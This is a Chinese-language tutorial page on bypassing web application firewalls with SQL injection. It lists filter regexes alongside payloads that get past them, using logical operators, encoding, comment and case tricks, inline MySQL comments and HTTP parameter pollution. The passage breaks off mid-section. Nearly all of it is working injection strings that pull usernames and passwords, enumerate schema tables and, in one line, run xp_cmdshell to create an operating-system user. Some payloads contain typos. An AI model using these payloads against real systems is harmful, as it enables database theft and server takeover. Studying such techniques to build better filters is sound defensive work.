关于SQL注入绕过的一些知识点
<p><span><strong>一、 绕过waf思路</strong></span></p>
<p>
从第一步起,一点一点去分析,然后绕过。</p>
<p>
<strong>1、过滤 and,or</strong></p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_599325">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">preg_match(</code><code class="sql string">'/(and|or)/i'</code><code class="sql plain">, $id)</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">Filtered injection: 1 </code><code class="sql color1">or</code> <code class="sql plain">1 = 1 1 </code><code class="sql color1">and</code> <code class="sql plain">1 = 1</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">Bypassed injection: 1 || 1 = 1 1 && 1 = 1</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<strong>2、过滤 and, or, union</strong></p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_965200">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">preg_match(</code><code class="sql string">'/(and|or|union)/i'</code><code class="sql plain">, $id)</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">Filtered injection: </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql color2">user</code><code class="sql plain">, </code><code class="sql keyword">password</code> <code class="sql keyword">from</code> <code class="sql plain">users</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">Bypassed injection: 1 || (</code><code class="sql keyword">select</code> <code class="sql color2">user</code> <code class="sql keyword">from</code> <code class="sql plain">users </code><code class="sql keyword">where</code> <code class="sql plain">user_id = 1) = </code><code class="sql string">'admin'</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<strong>3、过滤 and, or, union, where</strong></p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_46104">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">preg_match(</code><code class="sql string">'/(and|or|union|where)/i'</code><code class="sql plain">, $id)</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">Filtered injection: 1 || (</code><code class="sql keyword">select</code> <code class="sql color2">user</code> <code class="sql keyword">from</code> <code class="sql plain">users </code><code class="sql keyword">where</code> <code class="sql plain">user_id = 1) = </code><code class="sql string">'admin'</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">Bypassed injection: 1 || (</code><code class="sql keyword">select</code> <code class="sql color2">user</code> <code class="sql keyword">from</code> <code class="sql plain">users limit 1) = </code><code class="sql string">'admin'</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<strong>4、过滤 and, or, union, where, limit</strong></p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_669429">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">preg_match(</code><code class="sql string">'/(and|or|union|where|limit)/i'</code><code class="sql plain">, $id)</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">Filtered injection: 1 || (</code><code class="sql keyword">select</code> <code class="sql color2">user</code> <code class="sql keyword">from</code> <code class="sql plain">users limit 1) = </code><code class="sql string">'admin'</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">Bypassed injection: 1 || (</code><code class="sql keyword">select</code> <code class="sql color2">user</code> <code class="sql keyword">from</code> <code class="sql plain">users </code><code class="sql keyword">group</code> <code class="sql keyword">by</code> <code class="sql plain">user_id </code><code class="sql keyword">having</code> <code class="sql plain">user_id = 1) = </code><code class="sql string">'admin'</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<strong>5、过滤 and, or, union, where, limit, group by</strong></p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_876409">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">preg_match(</code><code class="sql string">'/(and|or|union|where|limit|group by)/i'</code><code class="sql plain">, $id)</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">Filtered injection: 1 || (</code><code class="sql keyword">select</code> <code class="sql color2">user</code> <code class="sql keyword">from</code> <code class="sql plain">users </code><code class="sql keyword">group</code> <code class="sql keyword">by</code> <code class="sql plain">user_id </code><code class="sql keyword">having</code> <code class="sql plain">user_id = 1) = </code><code class="sql string">'admin'</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">Bypassed injection: 1 || (</code><code class="sql keyword">select</code> <code class="sql plain">substr(gruop_concat(user_id),1,1) </code><code class="sql color2">user</code> <code class="sql keyword">from</code> <code class="sql plain">users ) = 1</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<strong>6、过滤 and, or, union, where, limit, group by, select</strong></p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_451994">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">preg_match(</code><code class="sql string">'/(and|or|union|where|limit|group by|select)/i'</code><code class="sql plain">, $id)</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">Filtered injection: 1 || (</code><code class="sql keyword">select</code> <code class="sql plain">substr(gruop_concat(user_id),1,1) </code><code class="sql color2">user</code> <code class="sql keyword">from</code> <code class="sql plain">users) = 1</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">Bypassed injection: 1 || 1 = 1 </code><code class="sql keyword">into</code> <code class="sql plain">outfile </code><code class="sql string">'result.txt'</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">Bypassed injection: 1 || substr(</code><code class="sql color2">user</code><code class="sql plain">,1,1) = </code><code class="sql string">'a'</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<strong>7、过滤 and, or, union, where, limit, group by, select, ‘</strong></p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_693480">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">preg_match(</code><code class="sql string">'/(and|or|union|where|limit|group by|select|\')/i'</code><code class="sql plain">, $id)</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">Filtered injection: 1 || (</code><code class="sql keyword">select</code> <code class="sql plain">substr(gruop_concat(user_id),1,1) </code><code class="sql color2">user</code> <code class="sql keyword">from</code> <code class="sql plain">users) = 1</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">Bypassed injection: 1 || user_id </code><code class="sql keyword">is</code> <code class="sql color1">not</code> <code class="sql color1">null</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">Bypassed injection: 1 || substr(</code><code class="sql color2">user</code><code class="sql plain">,1,1) = 0x61</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">Bypassed injection: 1 || substr(</code><code class="sql color2">user</code><code class="sql plain">,1,1) = unhex(61)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<strong>8、过滤 and, or, union, where, limit, group by, select, ‘, hex</strong></p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_76562">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">preg_match(</code><code class="sql string">'/(and|or|union|where|limit|group by|select|\'|hex)/i'</code><code class="sql plain">, $id)</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">Filtered injection: 1 || substr(</code><code class="sql color2">user</code><code class="sql plain">,1,1) = unhex(61)</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">Bypassed injection: 1 || substr(</code><code class="sql color2">user</code><code class="sql plain">,1,1) = </code><code class="sql color2">lower</code><code class="sql plain">(conv(11,10,36))</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<strong>9、过滤 and, or, union, where, limit, group by, select, ‘, hex, substr</strong></p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_843317">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">preg_match(</code><code class="sql string">'/(and|or|union|where|limit|group by|select|\'|hex|substr)/i'</code><code class="sql plain">, $id)</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">Filtered injection: 1 || substr(</code><code class="sql color2">user</code><code class="sql plain">,1,1) = </code><code class="sql color2">lower</code><code class="sql plain">(conv(11,10,36))</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">Bypassed injection: 1 || lpad(</code><code class="sql color2">user</code><code class="sql plain">,7,1)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<strong>10、过滤 and, or, union, where, limit, group by, select, ‘, hex, substr, 空格</strong></p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_936280">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">preg_match(</code><code class="sql string">'/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i'</code><code class="sql plain">, $id)</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">Filtered injection: 1 || lpad(</code><code class="sql color2">user</code><code class="sql plain">,7,1)</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">ypassed injection: 1%0b||%0blpad(</code><code class="sql color2">user</code><code class="sql plain">,7,1)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<span><strong>二、正则绕过</strong></span></p>
<p>
根据正则的的模糊匹配特性绕过,比如过滤了'='</p>
<p>
<code>filtered injection: 1 or 1 = 1</code></p>
<p>
<code>Bypassed injection: 1 or 1,1 or ‘1',1 or char(97)</code></p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_299366">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">eg:</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">filtered injection: 1 </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">1, table_name </code><code class="sql keyword">from</code> <code class="sql plain">information_schema.tables </code><code class="sql keyword">where</code> <code class="sql plain">table_name = </code><code class="sql string">'users'</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">Bypassed injection: 1 </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">1, table_name </code><code class="sql keyword">from</code> <code class="sql plain">information_schema.tables </code><code class="sql keyword">where</code> <code class="sql plain">table_name </code><code class="sql color1">between</code> <code class="sql string">'a'</code> <code class="sql color1">and</code> <code class="sql string">'z'</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">Bypassed injection: 1 </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">1, table_name </code><code class="sql keyword">from</code> <code class="sql plain">information_schema.tables </code><code class="sql keyword">where</code> <code class="sql plain">table_name </code><code class="sql color1">between</code> <code class="sql keyword">char</code><code class="sql plain">(97) </code><code class="sql color1">and</code> <code class="sql keyword">char</code><code class="sql plain">(122)</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">Bypassed injection: 1 </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">1, table_name </code><code class="sql keyword">from</code> <code class="sql plain">information_schema.tables </code><code class="sql keyword">where</code> <code class="sql plain">table_name </code><code class="sql color1">between</code> <code class="sql plain">0x61 </code><code class="sql color1">and</code> <code class="sql plain">0x7a</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">Bypassed Injection: 1 </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">1, table_name </code><code class="sql keyword">from</code> <code class="sql plain">information_schema.tables </code><code class="sql keyword">where</code> <code class="sql plain">table_name </code><code class="sql color1">like</code> <code class="sql plain">0x7573657273</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<span><strong>三、通用绕过</strong></span></p>
<p>
<strong>1.注释符</strong></p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_115724">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">?id=1+un//ion+se//lect+1,2,3–</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<strong>2.大小写</strong></p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_938958">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">?id=1+</code><code class="sql keyword">UnIoN</code><code class="sql plain">//</code><code class="sql keyword">SeLecT</code><code class="sql plain">//1,2,3–</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<strong>3.关键字替换</strong></p>
<p>
有些waf等使用preg_replace替换了SQL关键字</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_446730">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">?id=1+UNunionION+SEselectLECT+1,2,3</code><code class="sql comments">--</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">?id=1+uni%0bon+se%0blect+1,2,3</code><code class="sql comments">--</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
有时候注释符'/**/‘可能被过滤,也可以使用%0b绕过</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_240838">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">Forbidden: http://localhost/id/1/**/||/**/lpad(first_name,7,1).html</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">Bypassed : http://localhost/id/1%0b||%0blpad(first_name,7,1).html</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<strong>4.编码</strong></p>
<p>
一个经典的脚本:Nukesentinel.php</p>
<div class="jb51code">
<div>
<div class="syntaxhighlighterphp" id="highlighter_854233">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
<div class="line number13 index12 alt2">
13</div>
<div class="line number14 index13 alt1">
14</div>
<div class="line number15 index14 alt2">
15</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="php comments">// Check for UNION attack</code>
</div>
<div class="line number2 index1 alt1">
<code class="php spaces"> </code><code class="php comments">// Copyright 2004(c) Raven PHP Scripts</code>
</div>
<div class="line number3 index2 alt2">
<code class="php spaces"> </code><code class="php variable">$blocker_row</code> <code class="php plain">= </code><code class="php variable">$blocker_array</code><code class="php plain">;</code>
</div>
<div class="line number4 index3 alt1">
<code class="php spaces"> </code><code class="php keyword">if</code><code class="php plain">(</code><code class="php variable">$blocker_row</code><code class="php plain">[</code><code class="php string">'activate'</code><code class="php plain">] > 0) {</code>
</div>
<div class="line number5 index4 alt2">
<code class="php spaces"> </code><code class="php keyword">if</code> <code class="php plain">(</code><code class="php functions">stristr</code><code class="php plain">(</code><code class="php variable">$nsnst_const</code><code class="php plain">[</code><code class="php string">'query_string'</code><code class="php plain">],</code><code class="php string">'+union+'</code><code class="php plain">) OR \</code>
</div>
<div class="line number6 index5 alt1">
<code class="php spaces"> </code><code class="php functions">stristr</code><code class="php plain">(</code><code class="php variable">$nsnst_const</code><code class="php plain">[</code><code class="php string">'query_string'</code><code class="php plain">],</code><code class="php string">'%20union%20'</code><code class="php plain">) OR \</code>
</div>
<div class="line number7 index6 alt2">
<code class="php spaces"> </code><code class="php functions">stristr</code><code class="php plain">(</code><code class="php variable">$nsnst_const</code><code class="php plain">[</code><code class="php string">'query_string'</code><code class="php plain">],</code><code class="php string">'*/union/*'</code><code class="php plain">) OR \</code>
</div>
<div class="line number8 index7 alt1">
<code class="php spaces"> </code><code class="php functions">stristr</code><code class="php plain">(</code><code class="php variable">$nsnst_const</code><code class="php plain">[</code><code class="php string">'query_string'</code><code class="php plain">],</code><code class="php string">' union '</code><code class="php plain">) OR \</code>
</div>
<div class="line number9 index8 alt2">
<code class="php spaces"> </code><code class="php functions">stristr</code><code class="php plain">(</code><code class="php variable">$nsnst_const</code><code class="php plain">[</code><code class="php string">'query_string_base64'</code><code class="php plain">],</code><code class="php string">'+union+'</code><code class="php plain">) OR \</code>
</div>
<div class="line number10 index9 alt1">
<code class="php spaces"> </code><code class="php functions">stristr</code><code class="php plain">(</code><code class="php variable">$nsnst_const</code><code class="php plain">[</code><code class="php string">'query_string_base64'</code><code class="php plain">],</code><code class="php string">'%20union%20'</code><code class="php plain">) OR \</code>
</div>
<div class="line number11 index10 alt2">
<code class="php spaces"> </code><code class="php functions">stristr</code><code class="php plain">(</code><code class="php variable">$nsnst_const</code><code class="php plain">[</code><code class="php string">'query_string_base64'</code><code class="php plain">],</code><code class="php string">'*/union/*'</code><code class="php plain">) OR \</code>
</div>
<div class="line number12 index11 alt1">
<code class="php spaces"> </code><code class="php functions">stristr</code><code class="php plain">(</code><code class="php variable">$nsnst_const</code><code class="php plain">[</code><code class="php string">'query_string_base64'</code><code class="php plain">],</code><code class="php string">' union '</code><code class="php plain">)) { </code><code class="php comments">// block_ip($blocker_row);</code>
</div>
<div class="line number13 index12 alt2">
<code class="php spaces"> </code><code class="php keyword">die</code><code class="php plain">(</code><code class="php string">"BLOCK IP 1 "</code> <code class="php plain">);</code>
</div>
<div class="line number14 index13 alt1">
<code class="php spaces"> </code><code class="php plain">}</code>
</div>
<div class="line number15 index14 alt2">
<code class="php spaces"> </code><code class="php plain">}</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_474671">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">Forbidden: http://localhost/php/?/**/</code><code class="sql keyword">union</code><code class="sql plain">/**/</code><code class="sql keyword">select</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">Bypassed : http://localhost/php/?/%2A%2A/</code><code class="sql keyword">union</code><code class="sql plain">/%2A%2A/</code><code class="sql keyword">select</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">Bypassed : http://localhost/php/?%2f**%2funion%2f**%2fselect</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<strong>5.缓冲区溢出</strong></p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_257487">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">http://localhost/news.php?id=1+</code><code class="sql color1">and</code><code class="sql plain">+(</code><code class="sql keyword">select</code> <code class="sql plain">1)=(</code><code class="sql keyword">select</code> <code class="sql plain">0xA*1000)+</code><code class="sql keyword">union</code><code class="sql plain">+</code><code class="sql keyword">select</code><code class="sql plain">+1,2,version(),</code><code class="sql keyword">database</code><code class="sql plain">(),</code><code class="sql color2">user</code><code class="sql plain">(),6,7,8,9,10–</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<strong>6.内联注释(mysql)</strong></p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_486234">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">http://localhost/news.php?id=1/*!</code><code class="sql keyword">UnIoN</code><code class="sql plain">*/</code><code class="sql keyword">SeLecT</code><code class="sql plain">+1,2,3</code><code class="sql comments">--</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">http://localhost/news.php?id=/*!</code><code class="sql keyword">UnIoN</code><code class="sql plain">*/+/*!</code><code class="sql keyword">SeLecT</code><code class="sql plain">*/+1,2,concat(/*!table_name*/)+</code><code class="sql keyword">FrOm</code><code class="sql plain">/*!information_schema*/.tables/*!</code><code class="sql keyword">WhErE</code><code class="sql plain">*/+/*!TaBlE_sChEMa*/+</code><code class="sql color1">like</code><code class="sql plain">+</code><code class="sql keyword">database</code><code class="sql plain">()</code><code class="sql comments">--</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<span><strong>四、高级绕过</strong></span></p>
<p>
<strong>1.HPP(http参数污染)</strong></p>
<p>
举个例子:</p>
<div class="jb51code">
<div>
<div class="syntaxhighlighterplain" id="highlighter_205120">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="plain plain">index.php?par1=val1&par1=val2</code>
</div>
<div class="line number2 index1 alt1">
<code class="plain plain">| web server | par1 |</code>
</div>
<div class="line number3 index2 alt2">
<code class="plain plain">| :— | :— |</code>
</div>
<div class="line number4 index3 alt1">
<code class="plain plain">| ASP.NET/IIS | val1,val2 |</code>
</div>
<div class="line number5 index4 alt2">
<code class="plain plain">| ASP/IIS | val1,val2 |</code>
</div>
<div class="line number6 index5 alt1">
<code class="plain plain">| PHP/Apache | val2 |</code>
</div>
<div class="line number7 index6 alt2">
<code class="plain plain">| JSP/Tomcat | val1 |</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
eg:</p>
<p>
在ASP/ASP.NET的环境下</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_348374">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">Forbidden: http://localhost/search.aspx?q=</code><code class="sql keyword">select</code> <code class="sql keyword">name</code><code class="sql plain">,</code><code class="sql keyword">password</code> <code class="sql keyword">from</code> <code class="sql plain">users</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">Bypassed : http://localhost/search.aspx?q=</code><code class="sql keyword">select</code> <code class="sql keyword">name</code><code class="sql plain">&q=</code><code class="sql keyword">password</code> <code class="sql keyword">from</code> <code class="sql plain">users</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">Bypassed : http://localhost/search.aspx?q=</code><code class="sql keyword">select</code><code class="sql plain">/*&q=*/</code><code class="sql keyword">name</code><code class="sql plain">&q=</code><code class="sql keyword">password</code><code class="sql plain">/*&q=*/</code><code class="sql keyword">from</code><code class="sql plain">/*&q=*/users</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">Bypassed : http://localhost/news.aspx?id=1'; /*&id=1*/ </code><code class="sql keyword">EXEC</code> <code class="sql plain">/*&id=1*/ master..xp_cmdshell /*&id=1*/ net </code><code class="sql color2">user</code> <code class="sql plain">test test /*&id=1*/ </code><code class="sql comments">--</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<strong>2.HPC(http参数污染)</strong></p>
<p>
RFC2396定义了如下一些字符:</p>
<div class="jb51code">
